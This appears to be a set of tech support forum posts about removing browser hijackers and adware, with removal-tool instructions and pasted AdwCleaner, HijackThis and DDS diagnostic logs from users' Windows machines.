You're welcome. I'm glad everything got resolved! :)

No one replied to my previous thread. I am aware that this site is only run by voulenteers, but it's been over three days and I've been unable to get on my computer because it's been running so slowly.

Please help me and reply to my previous post? I'd appreciate it!

http://forums.techguy.org/virus-othe...go-chrome.html

What about Malwarebytes and RogueKiller, did you run those two, can I see the logs...

Google is now the home page in Firefox.
Chrome's home page was changed so that google.com appears. However, Bing can be click on at the very top of the page and it's page will appear. How should I delete Bing in Chrome?

The Bing toolbar was deleted sometime ago in Control Panel, Programs and Features.

After using AdwCleaner, I then clicked Start and typed %temp%, deleted the files, then typed c:\windows\temp and deleted those files. All files were deleted and I rebooted. This was at the suggestion of another malware removal specialist a few months ago.

# AdwCleaner v3.213 - Report created 23/06/2014 at 17:13:22
# Updated 23/06/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Jack Schwartz - JACKSCHWARTZ-PC
# Running from : C:\Users\Jack Schwartz\Downloads\AdwCleaner (9).exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\Software\BillP Studios

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17126


-\\ Mozilla Firefox v30.0 (en-US)

[ File : C:\Users\Jack Schwartz\AppData\Roaming\Mozilla\Firefox\Profiles\lsxpajl7.default\prefs.js ]


-\\ Google Chrome v35.0.1916.153

[ File : C:\Users\Jack Schwartz\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://en.softonic.com/s/{searchTerms}
Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://web.search.aol.com/redirector/sredir?sredir=843&q={searchTerms}&s_it=customie11-ie

*************************

AdwCleaner[R0].txt - [13377 octets] - [11/04/2014 12:19:42]
AdwCleaner[R10].txt - [2087 octets] - [17/06/2014 14:48:56]
AdwCleaner[R11].txt - [2128 octets] - [23/06/2014 17:11:39]
AdwCleaner[R1].txt - [3081 octets] - [22/05/2014 20:51:13]
AdwCleaner[R2].txt - [3141 octets] - [22/05/2014 20:55:01]
AdwCleaner[R3].txt - [3347 octets] - [22/05/2014 21:00:25]
AdwCleaner[R4].txt - [3261 octets] - [22/05/2014 21:02:51]
AdwCleaner[R5].txt - [1513 octets] - [22/05/2014 21:10:03]
AdwCleaner[R6].txt - [3945 octets] - [29/05/2014 19:42:31]
AdwCleaner[R7].txt - [3295 octets] - [31/05/2014 05:02:33]
AdwCleaner[R8].txt - [2171 octets] - [16/06/2014 07:08:22]
AdwCleaner[R9].txt - [2174 octets] - [16/06/2014 07:42:35]
AdwCleaner[S0].txt - [13628 octets] - [11/04/2014 12:20:43]
AdwCleaner[S1].txt - [3257 octets] - [22/05/2014 21:03:39]
AdwCleaner[S2].txt - [1578 octets] - [22/05/2014 21:10:50]
AdwCleaner[S3].txt - [3572 octets] - [29/05/2014 19:44:46]
AdwCleaner[S4].txt - [3376 octets] - [31/05/2014 05:03:38]
AdwCleaner[S5].txt - [1973 octets] - [16/06/2014 07:12:11]
AdwCleaner[S6].txt - [2241 octets] - [16/06/2014 07:43:26]
AdwCleaner[S7].txt - [2419 octets] - [17/06/2014 16:22:56]
AdwCleaner[S8].txt - [2320 octets] - [23/06/2014 17:13:22]

########## EOF - C:\AdwCleaner\AdwCleaner[S8].txt - [2380 octets] ##########

I downloaded hitmanpro and it scanned and fixed the issue. Sorry if anyone else has had this problem, but that should help if you download and scan.

OK, that seems to have done it...Thanks

I have had quite the time finding Go Advanced and then Manage Attachments.


Sorry.

I have a spyware/virus(?) that keeps highlighting everything and leading to another link. It's annoying and not sure what exactly to do. I saw someone else with a similar problem and a tech that gave the solution. Just wondering if it's possible for anyone to get important data from me pasting my logs on this forum? Also, will it cause anything to be deleted from my computer? Thanks in advance for any help!

BUMP

help me out please!!

Yes Malwarebytes is very good, sometimes cannot keep up with new version of infections....

Save the attached file fixlist.txt to your flash drive, same place as FRST.
Now please enter System Recovery Options as you did to get the log.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the flashdrive (Fixlog.txt) please post it to your reply.

Next,

Re-boot see if windows will run in Normal mode, if so continue please:

Download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

• Double-click to run it. When the tool opens click Yes to disclaimer.
• Press Scan button.
• It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
• The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

Next,

Please download RogueKiller and save it to your desktop from the following link: http://www.bleepingcomputer.com/download/roguekiller/

• Quit all running programs.
• For Windows XP, double-click to start.
• For Vista,Windows 7/8, Right-click on the program and select Run as Administrator to start and when prompted allow it to run.
• Read and accept the EULA (End User Licene Agreement)
• Click Scan to scan the system.
• When the scan completes Close the program > Don't Fix anything!
• Post back the report which should be located on your desktop.

Let me see those logs in next reply...

Kevin

Attached Files

fixlist.txt (2.2 KB)

Please download ADWCleaner. Click on the Download Now button and save it to your desktop.

Close your browser and double-click on the AdwCleaner icon on your desktop to run the program.

Click on the Scan button. It may take several minutes to complete. When it is done click on the Report button and copy and paste the log here please.

I'm not concerned about the Windows Installer file. I believe the two go hand in hand. Windows installer files are created when software gets installed so there's no harm in having quarantined that one.

Serge2012, thanks for the update, but to be on the safe side I would highly recommend you run FRST and post the logs for me to review. You never know what might still be in there without a proper check. Malwarebytes is very good at removing Malware, but there could be some remnants left behind that would best be removed.

It's your choice.

Hi juanito88,

It's been a while since you posted... Sorry for that.
Do you still need help?

I had a post up here a while back that never got addressed. I figure it got over looked or it did not seem to be what I thought it was. I am posting this problem here now because of that prior incident which had somethign to do with IE and how the machine was jumpy and runniong funny even after the MS fix for IE.
The computer crashed with no warning to a black screen. It was still running as best I could tell. After it did nothing with ctr/a;t/delete I tried to shut it down by holding the power button. No effect. I hooked up a regular monitor, no luck. I use it with battery in and the cord hooked up so I removed the battery (IDK Why that occurred to me) When I opened the lid there was the desktop but it was all large like it was safe mode but it wasn't safe mode. I put that battery back in and the screen was gone. ???? I tried again to force it to shut down by taking the battery out and unplugging it. I got nothing after I plugged it back in and put the battery back in. I left it alone for a couple of hours with the monitor plugged into it. I just came back to it and it started up my desktop is on the monitor not the Laptop and I am in safe mode with networking.
Thank You
Sys Info
Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft® Windows Vista™ Home Premium, Service Pack 2, 64 bit
Processor: Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz, Intel64 Family 6 Model 15 Stepping 13
Processor Count: 2
RAM: 3963 Mb
Graphics Card: Mobile Intel(R) 4 Series Express Chipset Family, 1853 Mb
Hard Drives: C: Total - 142858 MB, Free - 83769 MB;
Motherboard: TOSHIBA, Portable PC
Antivirus: Microsoft Security Essentials, Updated and Enabled

HJT
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 10:34:37 AM, on 6/24/2014
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v9.00 (9.00.8112.16555)
Boot mode: Safe mode with network support

Running processes:
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Users\user2\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = Preserve
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O1 - Hosts: ::1 localhost
O2 - BHO: Ghostery BHO - {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [TOSCDSPD] TOSCDSPD.EXE
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: Ghostery - {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab
O18 - Filter hijack: text/html - {4459DC76-1FDE-4B16-BAD0-E4F8E7647555} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryMimeFilter.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Unknown owner - C:\Windows\system32\agr64svc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: @dfsrres.dll,-101 (DFSR) - Unknown owner - C:\Windows\system32\DFSR.exe (file missing)
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SLsvc.exe,-101 (slsvc) - Unknown owner - C:\Windows\system32\SLsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files (x86)\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - Unknown owner - C:\Windows\system32\TODDSrv.exe (file missing)
O23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 7477 bytes

DDS
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 9.0.8112.16555 BrowserJavaVersion: 10.55.2
Run by user2 at 10:36:39 on 2014-06-24
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.3963.2985 [GMT -7:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {641105E6-77ED-3F35-A304-765193BCB75F}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Windows Mail\WinMail.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\GhosteryIEplugin\GhosteryRegistryProxy.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uSearch Bar = Preserve
uProxyOverride = <local>
mWinlogon: Userinit = userinit.exe,
BHO: Ghostery Add-On: {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRun: [TOSCDSPD] TOSCDSPD.EXE
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\HPDIGI~1.LNK - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MICROS~1.LNK - C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86} : DHCPNameServer = 75.75.75.75 75.75.76.76
Filter: text/html - {4459DC76-1FDE-4B16-BAD0-E4F8E7647555} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryMimeFilter.dll
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
x64-Run: [IAAnotif] "C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe"
x64-Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [TPwrMain] C:\Program Files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
x64-Run: [HSON] C:\Program Files (x86)\TOSHIBA\TBS\HSON.exe
x64-Run: [SmoothView] C:\Program Files (x86)\Toshiba\SmoothView\SmoothView.exe
x64-Run: [00TCrdMain] C:\Program Files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Run: [RtHDVCpl] RAVCpl64.exe
x64-Run: [Skytel] Skytel.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Filter: text/html - {4459DC76-1FDE-4B16-BAD0-E4F8E7647555} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\user2\AppData\Roaming\Mozilla\Firefox\Profiles\y89g7629.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - about:blank
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_125.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;aswRvrt;C:\Windows\System32\drivers\aswRvrt.sys [2013-3-18 65336]
R0 aswVmm;aswVmm;C:\Windows\System32\drivers\aswVmm.sys [2013-3-18 178624]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\Windows\System32\drivers\tos_sps64.sys [2012-3-4 504912]
R2 !SASCORE;SAS Core Service;C:\Program Files\SUPERAntiSpyware\SASCore64.exe [2011-8-11 140672]
R3 FwLnk;FwLnk Driver;C:\Windows\System32\drivers\FwLnk.sys [2008-8-18 8704]
S0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2014-1-25 268512]
S1 SASDIFSV;SASDIFSV;C:\Program Files\SUPERAntiSpyware\sasdifsv64.sys [2011-7-22 14928]
S1 SASKUTIL;SASKUTIL;C:\Program Files\SUPERAntiSpyware\saskutil64.sys [2011-7-12 12368]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 27648]
S2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2013-9-27 133928]
S2 TMachInfo;TMachInfo;C:\Program Files (x86)\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2008-8-18 46392]
S3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2014-3-11 347872]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2008-1-20 19968]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0 400.exe [2013-9-11 1012344]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2012-3-4 89920]
S4 KR10I64;KR10I64;C:\Windows\System32\drivers\KR10I64.sys [2008-8-18 248320]
S4 KR10N64;KR10N64;C:\Windows\System32\drivers\KR10N64.sys [2008-8-18 237568]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2014-06-15 13:33:47 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-15 13:33:47 699056 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-06-11 21:17:36 95414520 ----a-w- C:\Windows\System32\mrt.exe
2014-05-28 18:53:05 17857536 ----a-w- C:\Windows\System32\mshtml.dll
2014-05-28 18:37:06 2338816 ----a-w- C:\Windows\System32\jscript9.dll
2014-05-28 18:35:43 10890240 ----a-w- C:\Windows\System32\ieframe.dll
2014-05-28 18:31:53 1348608 ----a-w- C:\Windows\System32\urlmon.dll
2014-05-28 18:31:31 1392128 ----a-w- C:\Windows\System32\wininet.dll
2014-05-28 18:30:24 1494016 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-05-28 18:30:06 237056 ----a-w- C:\Windows\System32\url.dll
2014-05-28 18:29:57 86016 ----a-w- C:\Windows\System32\jsproxy.dll
2014-05-28 18:29:28 173056 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-05-28 18:29:19 599040 ----a-w- C:\Windows\System32\vbscript.dll
2014-05-28 18:29:19 2148352 ----a-w- C:\Windows\System32\iertutil.dll
2014-05-28 18:29:11 816640 ----a-w- C:\Windows\System32\jscript.dll
2014-05-28 18:29:09 729088 ----a-w- C:\Windows\System32\msfeeds.dll
2014-05-28 18:28:40 55296 ----a-w- C:\Windows\System32\msfeedsbs.dll
2014-05-28 18:28:38 453120 ----a-w- C:\Windows\System32\dxtmsft.dll
2014-05-28 18:28:34 282112 ----a-w- C:\Windows\System32\dxtrans.dll
2014-05-28 18:28:30 11264 ----a-w- C:\Windows\System32\msfeedssync.exe
2014-05-28 18:28:20 96768 ----a-w- C:\Windows\System32\mshtmled.dll
2014-05-28 18:28:10 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2014-05-28 18:28:02 12800 ----a-w- C:\Windows\System32\mshta.exe
2014-05-28 18:27:30 248320 ----a-w- C:\Windows\System32\ieui.dll
2014-05-28 16:48:31 12356608 ----a-w- C:\Windows\SysWow64\mshtml.dll
2014-05-28 16:39:36 1810432 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-05-28 16:38:21 9711104 ----a-w- C:\Windows\SysWow64\ieframe.dll
2014-05-28 16:33:46 1106432 ----a-w- C:\Windows\SysWow64\urlmon.dll
2014-05-28 16:32:59 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-05-28 16:32:25 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-05-28 16:31:33 231936 ----a-w- C:\Windows\SysWow64\url.dll
2014-05-28 16:31:17 65536 ----a-w- C:\Windows\SysWow64\jsproxy.dll
2014-05-28 16:30:53 421376 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-05-28 16:30:53 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-05-28 16:30:44 717824 ----a-w- C:\Windows\SysWow64\jscript.dll
2014-05-28 16:30:31 1796096 ----a-w- C:\Windows\SysWow64\iertutil.dll
2014-05-28 16:30:25 607744 ----a-w- C:\Windows\SysWow64\msfeeds.dll
2014-05-28 16:30:08 353792 ----a-w- C:\Windows\SysWow64\dxtmsft.dll
2014-05-28 16:30:00 41472 ----a-w- C:\Windows\SysWow64\msfeedsbs.dll
2014-05-28 16:29:58 223232 ----a-w- C:\Windows\SysWow64\dxtrans.dll
2014-05-28 16:29:49 10752 ----a-w- C:\Windows\SysWow64\msfeedssync.exe
2014-05-28 16:29:44 73216 ----a-w- C:\Windows\SysWow64\mshtmled.dll
2014-05-28 16:29:31 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-05-28 16:29:27 11776 ----a-w- C:\Windows\SysWow64\mshta.exe
2014-05-28 16:28:35 176640 ----a-w- C:\Windows\SysWow64\ieui.dll
2014-04-30 00:46:03 96168 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-04-30 00:46:00 264616 ----a-w- C:\Windows\SysWow64\javaws.exe
2014-04-30 00:46:00 175528 ----a-w- C:\Windows\SysWow64\javaw.exe
2014-04-30 00:46:00 175016 ----a-w- C:\Windows\SysWow64\java.exe
2014-04-26 18:21:07 622592 ----a-w- C:\Windows\System32\usp10.dll
2014-04-26 16:01:22 502784 ----a-w- C:\Windows\SysWow64\usp10.dll
2014-04-05 04:26:44 1417664 ----a-w- C:\Windows\System32\drivers\tcpip.sys
2014-04-05 02:32:17 40448 ----a-w- C:\Windows\System32\drivers\tcpipreg.sys
.
============= FINISH: 10:37:25.41 ===============

attach.txt
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 3/4/2012 12:49:16 PM
System Uptime: 6/24/2014 10:22:31 AM (0 hours ago)
.
Motherboard: TOSHIBA | | Portable PC
Processor: Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz | CPU | 2161/667mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 140 GiB total, 81.792 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Atheros AR5007EG Wireless Network Adapter
Device ID: PCI\VEN_168C&DEV_001C&SUBSYS_7128144F&REV_01\4&C8C337F&0&00E1
Manufacturer: Atheros Communications Inc.
Name: Atheros AR5007EG Wireless Network Adapter
